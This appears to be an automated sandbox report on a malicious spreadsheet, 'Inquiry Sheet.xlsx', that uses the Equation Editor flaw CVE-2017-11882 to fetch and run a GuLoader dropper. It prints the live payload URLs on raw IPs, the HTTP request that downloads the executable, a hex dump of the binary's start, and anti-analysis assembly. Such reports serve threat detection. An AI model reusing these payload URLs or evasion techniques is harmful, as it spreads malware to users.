Windows Analysis Report: Inquiry Sheet.xlsx

Overview

General Information

Sample Name: Inquiry Sheet.xlsx
Analysis ID: 482488
MD5: b079763f132db9b4d979256a28909892
SHA1: 3f8ef9821671cbc8267baa2c6e9a41a18af45f78
SHA256: 71db7caab688d41a1c6bca4cafbf782d50a670a7c7e73ad3000dea754959cf2e
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/WEALTHYREM_ecI"}
Multi AV Scanner detection for submitted file
Source: Inquiry Sheet.xlsx ReversingLabs: Detection: 26%
Antivirus detection for URL or domain
Source: http://212.192.246.25/excel/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 17%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 17%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://37.0.11.217/WEALTHYREM_ecI
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RHC-HOSTINGGB
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Mon, 13 Sep 2021 18:16:54 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
  Last-Modified: Sun, 12 Sep 2021 22:03:18 GMT
  ETag: "22000-5cbd38416fb31"
  Accept-Ranges: bytes
  Content-Length: 139264
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 98 6b 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 01 00 00 90 00 00 00 00 00 00 bc 14 00 00 00 10 00 00 00 d0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 60 02 00 00 10 00 00 5c 62 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c8 01 00 28 00 00 00 00 20 02 00 3a 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 bd 01 00 00 10 00 00 00 c0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 58 45 00 00 00 d0 01 00 00 10 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3a 3b 00 00 00 20 02 00 00 
40 00 00 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  GET /excel/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 212.192.246.25
  Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: BEC4B86A.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC4B86A.emf

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326928 6_2_00326928
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323431 6_2_00323431
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A439 6_2_0032A439
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A42B 6_2_0032A42B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032441B 6_2_0032441B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032700F 6_2_0032700F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032247B 6_2_0032247B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325063 6_2_00325063
Source: C:\Users\Public\vbc.exe Code function: 6_2_00320C67 6_2_00320C67
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325C67 6_2_00325C67
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A467 6_2_0032A467
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032AC6F 6_2_0032AC6F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323C6C 6_2_00323C6C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B444 6_2_0032B444
Source: C:\Users\Public\vbc.exe Code function: 6_2_003244AC 6_2_003244AC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323897 6_2_00323897
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B498 6_2_0032B498
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325885 6_2_00325885
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329088 6_2_00329088
Source: C:\Users\Public\vbc.exe Code function: 6_2_003238E6 6_2_003238E6
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B4E4 6_2_0032B4E4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003270D8 6_2_003270D8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A92B 6_2_0032A92B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00320D2C 6_2_00320D2C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326110 6_2_00326110
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032491E 6_2_0032491E
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A51F 6_2_0032A51F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00321504 6_2_00321504
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325508 6_2_00325508
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329176 6_2_00329176
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325967 6_2_00325967
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325168 6_2_00325168
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032195B 6_2_0032195B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329D5B 6_2_00329D5B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325D58 6_2_00325D58
Source: C:\Users\Public\vbc.exe Code function: 6_2_00324548 6_2_00324548
Source: C:\Users\Public\vbc.exe Code function: 6_2_003211B3 6_2_003211B3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003215B7 6_2_003215B7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003271A4 6_2_003271A4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032559E 6_2_0032559E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00320D82 6_2_00320D82
Source: C:\Users\Public\vbc.exe Code function: 6_2_003229FE 6_2_003229FE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003255FE 6_2_003255FE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003245D0 6_2_003245D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A5D1 6_2_0032A5D1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003239C3 6_2_003239C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003269C1 6_2_003269C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00322A39 6_2_00322A39
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B61F 6_2_0032B61F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00322E00 6_2_00322E00
Source: C:\Users\Public\vbc.exe Code function: 6_2_00320A79 6_2_00320A79
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325260 6_2_00325260
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325E65 6_2_00325E65
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329A5E 6_2_00329A5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032AA40 6_2_0032AA40
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325A4A 6_2_00325A4A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032324A 6_2_0032324A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00321248 6_2_00321248
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326649 6_2_00326649
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032164F 6_2_0032164F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A24C 6_2_0032A24C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003232A8 6_2_003232A8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003266AC 6_2_003266AC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A69A 6_2_0032A69A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00320A8A 6_2_00320A8A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032268D 6_2_0032268D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B2F3 6_2_0032B2F3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326EFC 6_2_00326EFC
Source: C:\Users\Public\vbc.exe Code function: 6_2_003216E0 6_2_003216E0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003226E6 6_2_003226E6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003256D0 6_2_003256D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A2D7 6_2_0032A2D7
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326EC1 6_2_00326EC1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323AC8 6_2_00323AC8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329B34 6_2_00329B34
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326F39 6_2_00326F39
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032532A 6_2_0032532A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00325B77 6_2_00325B77
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032436B 6_2_0032436B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B358 6_2_0032B358
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A341 6_2_0032A341
Source: C:\Users\Public\vbc.exe Code function: 6_2_00321347 6_2_00321347
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A3B8 6_2_0032A3B8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003237B9 6_2_003237B9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003233A2 6_2_003233A2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003237A0 6_2_003237A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003257A6 6_2_003257A6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00324F91 6_2_00324F91
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032B39C 6_2_0032B39C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323B83 6_2_00323B83
Source: C:\Users\Public\vbc.exe Code function: 6_2_00323BF7 6_2_00323BF7
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329BF4 6_2_00329BF4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003253F9 6_2_003253F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003213ED 6_2_003213ED
Source: C:\Users\Public\vbc.exe Code function: 6_2_003217D0 6_2_003217D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A7CC 6_2_0032A7CC
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326928 NtAllocateVirtualMemory, 6_2_00326928
Source: C:\Users\Public\vbc.exe Code function: 6_2_003269C1 NtAllocateVirtualMemory, 6_2_003269C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326A91 NtAllocateVirtualMemory, 6_2_00326A91
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326B75 NtAllocateVirtualMemory, 6_2_00326B75
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: Inquiry Sheet.xlsx ReversingLabs: Detection: 26%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Inquiry Sheet.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE407.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/27@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402B34 push esi; retn 000Ch 6_2_00419669
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405C5A pushad ; iretd 6_2_00405C5B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00407D62 push edi; iretd 6_2_00407D68
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408701 push esi; ret 6_2_00408702
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040631B push es; iretd 6_2_0040631F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409134 push ebp; ret 6_2_0040915D
Source: C:\Users\Public\vbc.exe Code function: 6_2_004089D5 push eax; ret 6_2_004089D6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405F90 push ds; retf 6_2_00405FD3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003242B8 pushad ; retf 6_2_0032433D
Source: initial sample Static PE information: section name: .text entropy: 7.07203430098

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000329831 second address: 0000000000329831 instructions:
  0x00000000 rdtsc
  0x00000002 mov eax, FCDACE93h
  0x00000007 sub eax, 1A63DDA3h
  0x0000000c xor eax, D5EBB4F5h
  0x00000011 add eax, C862BBFCh
  0x00000016 cpuid
  0x00000018 jmp 00007F22F08EB422h
  0x0000001a pushad
  0x0000001b mov dx, C148h
  0x0000001f cmp dx, C148h
  0x00000024 jne 00007F22F08EA77Dh
  0x0000002a popad
  0x0000002b popad
  0x0000002c call 00007F22F08EB3E8h
  0x00000031 lfence
  0x00000034 mov edx, CD724B6Dh
  0x00000039 xor edx, AC8852AFh
  0x0000003f xor edx, A3550569h
  0x00000045 xor edx, BD511CBFh
  0x0000004b mov edx, dword ptr [edx]
  0x0000004d lfence
  0x00000050 test edx, eax
  0x00000052 cmp eax, edx
  0x00000054 test eax, ecx
  0x00000056 ret
  0x00000057 sub edx, esi
  0x00000059 ret
  0x0000005a add edi, edx
  0x0000005c dec dword ptr [ebp+000000F8h]
  0x00000062 cmp dword ptr [ebp+000000F8h], 00000000h
  0x00000069 jne 00007F22F08EB3C9h
  0x0000006b test dl, FFFFFFE1h
  0x0000006e call 00007F22F08EB42Bh
  0x00000073 call 00007F22F08EB45Ch
  0x00000078 lfence
  0x0000007b mov edx, CD724B6Dh
  0x00000080 xor edx, AC8852AFh
  0x00000086 xor edx, A3550569h
  0x0000008c xor edx, BD511CBFh
  0x00000092 mov edx, dword ptr [edx]
  0x00000094 lfence
  0x00000097 test edx, eax
  0x00000099 cmp eax, edx
  0x0000009b test eax, ecx
  0x0000009d ret
  0x0000009e mov esi, edx
  0x000000a0 pushad
  0x000000a1 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2832 Thread sleep time: -300000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329829 rdtsc 6_2_00329829

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00329829 rdtsc 6_2_00329829
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00328C25 mov eax, dword ptr fs:[00000030h] 6_2_00328C25
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032441B mov eax, dword ptr fs:[00000030h] 6_2_0032441B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00326503 mov eax, dword ptr fs:[00000030h] 6_2_00326503
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A24C mov eax, dword ptr fs:[00000030h] 6_2_0032A24C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003292EB mov eax, dword ptr fs:[00000030h] 6_2_003292EB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0032A2D7 mov eax, dword ptr fs:[00000030h] 6_2_0032A2D7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003237A0 mov eax, dword ptr fs:[00000030h] 6_2_003237A0

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp Binary or memory string: Program Manager<